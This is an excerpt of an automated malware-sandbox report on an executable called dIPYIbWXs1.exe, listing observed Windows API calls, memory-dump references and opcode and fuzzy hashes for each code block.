                                                        • Associated: 00000000.00000002.3911740222.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: CloseQueryValue
                                                        • String ID:
                                                        • API String ID: 3356406503-0
                                                        • Opcode ID: 6213eafd8b46f955f614869397e07eb9b1fadeed980eca135cc1a2a492507a25
                                                        • Instruction ID: 101e8c123746c764c526cee79e76b60048690b918ccacca24166b7bb3c1ff757
                                                        • Opcode Fuzzy Hash: 6213eafd8b46f955f614869397e07eb9b1fadeed980eca135cc1a2a492507a25
                                                        • Instruction Fuzzy Hash: EA11C171A00205EFDF25DF64CE985AE7AB4EF00355F20843FE446B72C0D6B88A86DB19
                                                        APIs
                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                        • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3911703874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3911680177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911725118.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: c8a7ffa28b32ff67f29a84afd2625c26bb9c758fd8177903822af55b1e7359ed
                                                        • Instruction ID: 5c958b1953f7fe6cfac6f5d6f257cc34f78b067395a477e057d2c1298905e336
                                                        • Opcode Fuzzy Hash: c8a7ffa28b32ff67f29a84afd2625c26bb9c758fd8177903822af55b1e7359ed
                                                        • Instruction Fuzzy Hash: F801D1317242209BE7195B79DD08B6A3698E710718F50823AF851F61F1DA78DC129B4D
                                                        APIs
                                                        • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 00402442
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0040244B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3911703874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3911680177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911725118.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: CloseDeleteValue
                                                        • String ID:
                                                        • API String ID: 2831762973-0
                                                        • Opcode ID: 07b32314aa9a422e600aa3f6776080c68f979d551996adedd097d7eb0a26439f
                                                        • Instruction ID: 28034f9d49707e31730e5ee4ae5769526bd8744af0d0927f07882998c216e066
                                                        • Opcode Fuzzy Hash: 07b32314aa9a422e600aa3f6776080c68f979d551996adedd097d7eb0a26439f
                                                        • Instruction Fuzzy Hash: E3F09632600121DBE720BFA49B8EAAE72A59B40314F25453FF602B71C1D9F84E4246AE
                                                        APIs
                                                        • ShowWindow.USER32(00000000,00000000), ref: 00401EE3
                                                        • EnableWindow.USER32(00000000,00000000), ref: 00401EEE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3911703874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3911680177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911725118.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: Window$EnableShow
                                                        • String ID:
                                                        • API String ID: 1136574915-0
                                                        • Opcode ID: 8b7817ca22b79e9cee4aa1cb1be03623fa11f3862aed9c5f3b00cb70b3c6cfe0
                                                        • Instruction ID: 2686c2d45ba130581374544c13beebfcaf73fd10f5aa92b185336ae358fe78f7
                                                        • Opcode Fuzzy Hash: 8b7817ca22b79e9cee4aa1cb1be03623fa11f3862aed9c5f3b00cb70b3c6cfe0
                                                        • Instruction Fuzzy Hash: 69E09232B04200EFD714EFA5EA8856E7BB0EB40325B20413FF001F20C1DAB848418A69
                                                        APIs
                                                        • GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                          • Part of subcall function 00406492: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004064A9
                                                          • Part of subcall function 00406492: wsprintfA.USER32 ref: 004064E2
                                                          • Part of subcall function 00406492: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064F6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3911703874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3911680177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911725118.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                        • String ID:
                                                        • API String ID: 2547128583-0
                                                        • Opcode ID: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
                                                        • Instruction ID: acae0596759e2787f84b09bdc6f4b17f60683fab7501ae0ee02ebffea3798694
                                                        • Opcode Fuzzy Hash: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
                                                        • Instruction Fuzzy Hash: F7E08672A0421177D2105A74BE0893B72A8DE89740302043EF546F2144D7389C71966D
                                                        APIs
                                                        • GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\dIPYIbWXs1.exe,80000000,00000003), ref: 00405C94
                                                        • CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405CB6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3911703874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3911680177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911725118.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: File$AttributesCreate
                                                        • String ID:
                                                        • API String ID: 415043291-0
                                                        • Opcode ID: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                                                        • Instruction ID: ee59d6d0e1d409ab4f08bbdf592326cff3c7222ef74ae4255e7f212f1854b30f
                                                        • Opcode Fuzzy Hash: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                                                        • Instruction Fuzzy Hash: F5D09E31654201AFEF0D8F20DE16F2E7AA2EB84B00F11952CB782941E1DA715819AB19
                                                        APIs
                                                        • CreateDirectoryA.KERNELBASE(?,00000000,0040333B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405767
                                                        • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 00405775
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3911703874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3911680177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911725118.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: CreateDirectoryErrorLast
                                                        • String ID:
                                                        • API String ID: 1375471231-0
                                                        • Opcode ID: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                                                        • Instruction ID: 5acf30d11c51c39224c83c09ee2e5989404a14e094893e30e7ab7d3df00569a4
                                                        • Opcode Fuzzy Hash: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                                                        • Instruction Fuzzy Hash: 21C04C31244505EFD6105B30AE08F177A90AB50741F1644396186E10B0EA388455E96D
                                                        APIs
                                                        • VirtualAllocEx.KERNELBASE(00000000), ref: 6E4B2AF7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3953123008.000000006E4B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6E4B0000, based on PE: true
                                                        • Associated: 00000000.00000002.3953105444.000000006E4B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000000.00000002.3953136467.000000006E4B3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000000.00000002.3953149275.000000006E4B5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6e4b0000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        • Opcode ID: ff4cd7b8fd184ab736437eba975458a02e8bc70c6c8d48bfc94f3f9f33207bd2
                                                        • Instruction ID: d6a7e0966a50b2381b20bdb5937197fdd8d8351c27096790d3dfb2a8acdb2840
                                                        • Opcode Fuzzy Hash: ff4cd7b8fd184ab736437eba975458a02e8bc70c6c8d48bfc94f3f9f33207bd2
                                                        • Instruction Fuzzy Hash: 59411E72A08604EBDF10AFF4E844F993778EB49394F104C2BE50497255EF3499428BB9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3911703874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3911680177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911725118.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: wsprintf
                                                        • String ID:
                                                        • API String ID: 2111968516-0
                                                        • Opcode ID: 367ecb1198001a867d8e3b7756d3c175cfd735077116dd6966e3788219f0b2a9
                                                        • Instruction ID: 7f5a5d1368c13d317d2e99ee4d98356b480ceadea176dd08c5889da6900fd1c4
                                                        • Opcode Fuzzy Hash: 367ecb1198001a867d8e3b7756d3c175cfd735077116dd6966e3788219f0b2a9
                                                        • Instruction Fuzzy Hash: 7E21B730D04299FADF328BA885886AEBB749F11314F1440BFE491B73D1C2BD8A85DB19
                                                        APIs
                                                        • MoveFileA.KERNEL32(00000000,00000000), ref: 00401685
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3911703874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3911680177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911725118.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: FileMove
                                                        • String ID:
                                                        • API String ID: 3562171763-0
                                                        • Opcode ID: 1edc5c0a003d732ce3bee6573eefb30b8b2fa69015ea7de72e37931521f2516e
                                                        • Instruction ID: c16fe538d576f0a812f108a5c598968f2bbae53de2c44bc87e09c6d73b5458c5
                                                        • Opcode Fuzzy Hash: 1edc5c0a003d732ce3bee6573eefb30b8b2fa69015ea7de72e37931521f2516e
                                                        • Instruction Fuzzy Hash: EEF01D3160852496DB20ABA54E49E5F3264DB42769B24033BF422B21D1EABC8542956E
                                                        APIs
                                                        • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402749
                                                          • Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3911703874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3911680177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911725118.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: FilePointerwsprintf
                                                        • String ID:
                                                        • API String ID: 327478801-0
                                                        • Opcode ID: 6490c60e78b8e72c9ff7044d1ebd2fda03870678213011db9787ff048aa9e55a
                                                        • Instruction ID: d2cb0ca5e863be2ef59b536234997f243a65a7806d73518010ac019a9530af38
                                                        • Opcode Fuzzy Hash: 6490c60e78b8e72c9ff7044d1ebd2fda03870678213011db9787ff048aa9e55a
                                                        • Instruction Fuzzy Hash: 7EE09271B00114EED711FBA4AE49DBF77B8EB40315B10403BF102F10C1CABC49128A2E
                                                        APIs
                                                        • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 004023D5
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3911703874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3911680177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911725118.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: PrivateProfileStringWrite
                                                        • String ID:
                                                        • API String ID: 390214022-0
                                                        • Opcode ID: cd8b371b6f55f1d33d0eddf2f35f8062392e7128ea2648a4caa2e71cbd90ff81
                                                        • Instruction ID: a2264a5e3b04165b7de03e79847980bb6a424129cbe2f78830b73284cd35be0b
                                                        • Opcode Fuzzy Hash: cd8b371b6f55f1d33d0eddf2f35f8062392e7128ea2648a4caa2e71cbd90ff81
                                                        • Instruction Fuzzy Hash: F8E04831610114ABD7203EB14F8D97F31A9DB44304B34153FBA11761C6D9FC5C414279
                                                        APIs
                                                        • SearchPathA.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401733
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3911703874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3911680177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911725118.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: PathSearch
                                                        • String ID:
                                                        • API String ID: 2203818243-0
                                                        • Opcode ID: e053cd0a5a713bcd6573213f31fe775dca372833d122c7f25a227a8b80c7c065
                                                        • Instruction ID: 99b882ef8ac932529d6fdfe3c41faefb6a71927cb26e20fd81cb329c01224dc0
                                                        • Opcode Fuzzy Hash: e053cd0a5a713bcd6573213f31fe775dca372833d122c7f25a227a8b80c7c065
                                                        • Instruction Fuzzy Hash: 93E0DF72304210EFD710DF649E49BAB37A8DF10368B20427AE111A60C2E6F89906873D
                                                        APIs
                                                        • RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402C7F,00000000,?,?), ref: 00405FD4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3911703874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3911680177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911725118.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: Create
                                                        • String ID:
                                                        • API String ID: 2289755597-0
                                                        • Opcode ID: 33f0ef72135594440bd39ae1090de480165a05d63dfabbbeebd316e266d8c237
                                                        • Instruction ID: 8c71f3c26dc4a4bf3eef9e60a583d004d00a96479e721722a8f6be6a9d57506c
                                                        • Opcode Fuzzy Hash: 33f0ef72135594440bd39ae1090de480165a05d63dfabbbeebd316e266d8c237
                                                        • Instruction Fuzzy Hash: 1CE0E6B201450ABEDF095F50DD0ED7B3B1DE704300F14452EF906D4050E6B5A9205A34
                                                        APIs
                                                        • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032FD,00000000,00000000,00403127,000000FF,00000004,00000000,00000000,00000000), ref: 00405D1C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3911703874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3911680177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911725118.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                                                        • Instruction ID: 6bc3b1048b15a49576125e72cb6f14b4cec2b2626e36b687d4021167e808d8fe
                                                        • Opcode Fuzzy Hash: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                                                        • Instruction Fuzzy Hash: 2BE08C3221021EABCF109E608C08EEB3B6CEF00360F048833FD54E2140D234E8209BA4
                                                        APIs
                                                        • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032B3,00000000,0041D448,000000FF,0041D448,000000FF,000000FF,00000004,00000000), ref: 00405D4B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3911703874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3911680177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911725118.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: FileWrite
                                                        • String ID:
                                                        • API String ID: 3934441357-0
                                                        • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                        • Instruction ID: 0f83f4d47d9459a9b0ba24ed2798b341cbbd10940215494d2392ac534f962254
                                                        • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                        • Instruction Fuzzy Hash: 41E08C3220025AABCF10AFA08C04EEB3B6CEF00360F008833FA15E7050D630E8219BA8
                                                        APIs
                                                        • VirtualProtect.KERNELBASE(6E4B404C,00000004,00000040,6E4B403C), ref: 6E4B293F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3953123008.000000006E4B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6E4B0000, based on PE: true
                                                        • Associated: 00000000.00000002.3953105444.000000006E4B0000.00000002.00000001.01000000.00000005.sdmpDownload File
